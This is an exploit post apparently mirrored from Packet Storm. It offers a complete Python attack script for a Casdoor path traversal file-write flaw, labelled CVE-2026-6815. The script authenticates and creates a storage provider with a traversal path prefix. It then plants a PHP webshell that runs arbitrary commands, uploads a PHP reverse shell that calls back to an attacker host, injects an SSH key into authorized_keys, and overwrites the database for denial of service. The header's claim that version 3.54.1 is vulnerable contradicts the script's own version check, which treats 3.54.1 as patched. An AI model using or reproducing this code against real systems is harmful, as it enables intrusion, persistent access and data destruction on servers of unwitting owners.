Share
## https://sploitus.com/exploit?id=PACKETSTORM:223580
==================================================================================================================================
| # Title : Casdoor 3.54.1 Remote Code Execution via Storage Provider Manipulation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://casdoor.org/ |
==================================================================================================================================
[+] Summary : This script exploits a path traversal flaw in Casdoor that allows an authenticated attacker to write files anywhere on the server via a misconfigured storage provider.
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import json
import os
import sys
import time
import requests
import urllib3
from urllib.parse import urljoin
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class CasdoorExploit:
def __init__(self, target_url, username, password, app_name="app-built-in",
org_name="built-in", provider_name="path_traversal", verbose=False):
self.base_url = target_url.rstrip('/')
self.username = username
self.password = password
self.app_name = app_name
self.org_name = org_name
self.provider_name = provider_name
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0'
})
def log(self, msg, level="INFO"):
colors = {
"SUCCESS": "\033[92m[+]\033[0m",
"ERROR": "\033[91m[-]\033[0m",
"WARNING": "\033[93m[!]\033[0m",
"INFO": "\033[96m[*]\033[0m",
"PROC": "\033[94m[@]\033[0m"
}
print(f"{colors.get(level, '[*]')} {msg}")
def get_session(self):
"""Get initial session cookie"""
self.log("Retrieving session cookie...", "PROC")
try:
response = self.session.get(f"{self.base_url}/login/built-in")
if 'casdoor_session_id' in self.session.cookies:
self.log(f"Session ID: {self.session.cookies['casdoor_session_id']}", "SUCCESS")
return True
else:
self.log("Failed to get session cookie", "ERROR")
return False
except Exception as e:
self.log(f"Session error: {e}", "ERROR")
return False
def authenticate(self):
"""Authenticate to Casdoor"""
self.log(f"Authenticating as {self.username}...", "PROC")
login_payload = {
"application": self.app_name,
"organization": self.org_name,
"username": self.username,
"password": self.password,
"autoSignin": True,
"signinMethod": "Password",
"type": "login"
}
try:
response = self.session.post(
f"{self.base_url}/api/login",
json=login_payload,
headers={"Content-Type": "text/plain;charset=UTF-8"}
)
if response.status_code == 200:
data = response.json()
if data.get("status") == "ok":
self.log("Authentication successful", "SUCCESS")
return True
else:
self.log(f"Authentication failed: {data.get('msg')}", "ERROR")
return False
self.log(f"Authentication failed: HTTP {response.status_code}", "ERROR")
return False
except Exception as e:
self.log(f"Authentication error: {e}", "ERROR")
return False
def check_version(self):
"""Check Casdoor version for vulnerability"""
self.log("Checking Casdoor version...", "PROC")
try:
response = self.session.get(f"{self.base_url}/api/get-version-info")
if response.status_code == 200:
data = response.json()
version = data.get("data", {}).get("version") or data.get("version")
if version:
self.log(f"Casdoor version: {version}")
v_clean = version.lstrip('v').split('-')[0]
v_parts = [int(p) for p in v_clean.split('.')]
if v_parts[0] >= 3 and v_parts[1] >= 54 and v_parts[2] >= 1:
self.log("Version appears PATCHED (>= 3.54.1)", "WARNING")
return False
else:
self.log("Version appears VULNERABLE", "SUCCESS")
return True
else:
self.log(f"Could not retrieve version (HTTP {response.status_code})", "WARNING")
except Exception as e:
self.log(f"Version check error: {e}", "WARNING")
return True # Assume vulnerable if can't check
def create_malicious_provider(self):
"""Create storage provider with path traversal prefix"""
self.log("Creating malicious storage provider...", "PROC")
provider_payload = {
"owner": "admin",
"name": self.provider_name,
"createdTime": time.strftime("%Y-%m-%dT%H:%M:%S+01:00"),
"displayName": "Path Traversal Provider",
"category": "Storage",
"type": "Local File System",
"method": "Normal",
"pathPrefix": "../../../../../../../../../"
}
try:
response = self.session.post(
f"{self.base_url}/api/add-provider",
json=provider_payload,
headers={"Content-Type": "text/plain;charset=UTF-8"}
)
if response.status_code == 200:
data = response.json()
if data.get("status") == "ok":
self.log("Malicious provider created successfully", "SUCCESS")
return True
elif "UNIQUE constraint failed" in data.get("msg", ""):
self.log("Provider already exists, reusing", "INFO")
return True
else:
self.log(f"Failed to create provider: {data.get('msg')}", "ERROR")
return False
self.log(f"Provider creation failed: HTTP {response.status_code}", "ERROR")
return False
except Exception as e:
self.log(f"Provider creation error: {e}", "ERROR")
return False
def upload_file(self, local_file, remote_path):
"""Upload file to arbitrary remote path"""
self.log(f"Uploading {local_file} to {remote_path}...", "PROC")
if not os.path.exists(local_file):
self.log(f"Local file not found: {local_file}", "ERROR")
return False
params = {
"owner": self.org_name,
"user": self.username,
"application": self.app_name,
"tag": "custom",
"parent": "ResourceListPage",
"fullFilePath": remote_path,
"provider": self.provider_name
}
try:
with open(local_file, 'rb') as f:
files = {'file': (os.path.basename(local_file), f, 'application/octet-stream')}
response = self.session.post(
f"{self.base_url}/api/upload-resource",
params=params,
files=files
)
if response.status_code == 200:
data = response.json()
if data.get("status") == "ok":
self.log(f"File uploaded successfully to {remote_path}", "SUCCESS")
return True
else:
self.log(f"Upload failed: {data.get('msg')}", "ERROR")
return False
self.log(f"Upload failed: HTTP {response.status_code}", "ERROR")
return False
except Exception as e:
self.log(f"Upload error: {e}", "ERROR")
return False
def upload_content(self, content, remote_path):
"""Upload string content to arbitrary remote path"""
temp_file = f"/tmp/{int(time.time())}.tmp"
try:
with open(temp_file, 'w') as f:
f.write(content)
success = self.upload_file(temp_file, remote_path)
finally:
if os.path.exists(temp_file):
os.unlink(temp_file)
return success
def deploy_webshell(self, webshell_path=None):
"""Deploy PHP webshell for persistence"""
self.log("Deploying PHP webshell...", "PROC")
if not webshell_path:
webshell_path = "/var/www/html/shell.php"
webshell = '''<?php
if(isset($_REQUEST["cmd"])){
echo "<pre>";
system($_REQUEST["cmd"]);
echo "</pre>";
}
if(isset($_REQUEST["upload"])){
file_put_contents($_REQUEST["upload"], file_get_contents($_FILES["file"]["tmp_name"]));
echo "Uploaded: " . $_REQUEST["upload"];
}
?>'''
if self.upload_content(webshell, webshell_path):
webshell_url = urljoin(self.base_url, webshell_path.replace('/var/www/html', ''))
self.log(f"Webshell deployed at: {webshell_url}?cmd=id", "SUCCESS")
return webshell_url
return None
def inject_ssh_key(self, ssh_key_path=None, ssh_authorized_path=None):
"""Inject SSH public key for persistence"""
self.log("Injecting SSH key...", "PROC")
if ssh_key_path and os.path.exists(ssh_key_path):
with open(ssh_key_path, 'r') as f:
ssh_key = f.read()
else:
ssh_key = input("Enter SSH public key content: ")
if not ssh_authorized_path:
ssh_authorized_path = "/home/casdoor/.ssh/authorized_keys"
if self.upload_content(ssh_key, ssh_authorized_path):
self.log(f"SSH key injected to {ssh_authorized_path}", "SUCCESS")
self.log("You can now SSH as casdoor user", "INFO")
return True
return False
def execute_command(self, cmd, webshell_url=None):
"""Execute system command via webshell"""
if not webshell_url:
self.log("No webshell URL provided", "ERROR")
return None
try:
response = self.session.get(webshell_url, params={'cmd': cmd}, timeout=30)
if response.status_code == 200:
output = response.text
output = output.replace('<pre>', '').replace('</pre>', '')
return output.strip()
except Exception as e:
self.log(f"Command execution error: {e}", "ERROR")
return None
def reverse_shell(self, lhost, lport, webshell_url=None):
"""Deploy reverse shell payload"""
self.log(f"Deploying reverse shell to {lhost}:{lport}...", "PROC")
rev_shell = f'''<?php
$sock = fsockopen("{lhost}", {lport});
if ($sock) {{
exec("/bin/sh -i <&3 >&3 2>&3");
fclose($sock);
}}
?>'''
rev_shell_path = "/tmp/revshell.php"
if self.upload_content(rev_shell, rev_shell_path):
self.log("Reverse shell uploaded, triggering...", "PROC")
trigger_url = urljoin(self.base_url, rev_shell_path.replace('/var/www/html', ''))
try:
self.session.get(trigger_url, timeout=1)
self.log("Reverse shell payload sent. Check your listener!", "SUCCESS")
return True
except:
pass
return False
def corrupt_database(self, db_path=None):
"""Corrupt Casdoor database for DoS"""
self.log("Attempting database corruption...", "PROC")
if not db_path:
db_path = "/app/casdoor.db"
corrupt_content = f"CORRUPTED BY CVE-2026-6815 EXPLOIT - {time.time()}"
if self.upload_content(corrupt_content, db_path):
self.log(f"Database corrupted at {db_path}", "SUCCESS")
self.log("Casdoor service may be compromised", "WARNING")
return True
return False
def run(self, local_file=None, remote_path=None, action="webshell",
lhost=None, lport=None, ssh_key=None, webshell_path=None):
"""Main exploit routine"""
self.log(f"Target: {self.base_url}")
if not self.get_session():
self.log("Failed to get session", "ERROR")
return False
if not self.authenticate():
self.log("Authentication failed", "ERROR")
return False
if not self.check_version():
self.log("Target appears patched", "WARNING")
if not self.create_malicious_provider():
self.log("Failed to create provider", "ERROR")
return False
if action == "upload" and local_file and remote_path:
return self.upload_file(local_file, remote_path)
elif action == "webshell":
webshell_url = self.deploy_webshell(webshell_path)
if webshell_url and lhost and lport:
self.reverse_shell(lhost, lport, webshell_url)
return bool(webshell_url)
elif action == "ssh":
return self.inject_ssh_key(ssh_key)
elif action == "dos":
return self.corrupt_database()
elif action == "command" and webshell_path:
webshell_url = urljoin(self.base_url, webshell_path.replace('/var/www/html', ''))
cmd = input("Enter command to execute: ")
output = self.execute_command(cmd, webshell_url)
if output:
print("\n" + "=" * 60)
print(output)
print("=" * 60)
return bool(output)
else:
self.log("No valid action specified", "ERROR")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-6815 - Casdoor Path Traversal Arbitrary File Write",
epilog="""
Examples:
python3 exploit.py -t http://target:8000 -u admin -p 123 --action webshell
python3 exploit.py -t http://target:8000 -u admin -p 123 --action webshell --lhost 10.0.0.5 --lport 4444
python3 exploit.py -t http://target:8000 -u admin -p 123 --action ssh --ssh-key ~/.ssh/id_rsa.pub
python3 exploit.py -t http://target:8000 -u admin -p 123 --action upload --local shell.php --remote /var/www/html/shell.php
python3 exploit.py -t http://target:8000 -u admin -p 123 --action dos
"""
)
parser.add_argument("-t", "--target", required=True, help="Target Casdoor URL")
parser.add_argument("-u", "--username", default="admin", help="Username (default: admin)")
parser.add_argument("-p", "--password", default="123", help="Password (default: 123)")
parser.add_argument("--app", default="app-built-in", help="Application name")
parser.add_argument("--org", default="built-in", help="Organization name")
parser.add_argument("--action", choices=["webshell", "ssh", "upload", "dos", "command"],
default="webshell", help="Action to perform")
parser.add_argument("--local", help="Local file path for upload")
parser.add_argument("--remote", help="Remote file path for upload")
parser.add_argument("--webshell-path", help="Custom webshell path")
parser.add_argument("--ssh-key", help="SSH public key file")
parser.add_argument("--lhost", help="Listener host for reverse shell")
parser.add_argument("--lport", type=int, help="Listener port for reverse shell")
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
args = parser.parse_args()
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-6815 - Casdoor Path Traversal Arbitrary File Write โ
โ Remote Code Execution via Storage Provider Manipulation โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
exploit = CasdoorExploit(
target_url=args.target,
username=args.username,
password=args.password,
app_name=args.app,
org_name=args.org,
verbose=args.verbose
)
success = exploit.run(
local_file=args.local,
remote_path=args.remote,
action=args.action,
lhost=args.lhost,
lport=args.lport,
ssh_key=args.ssh_key,
webshell_path=args.webshell_path
)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================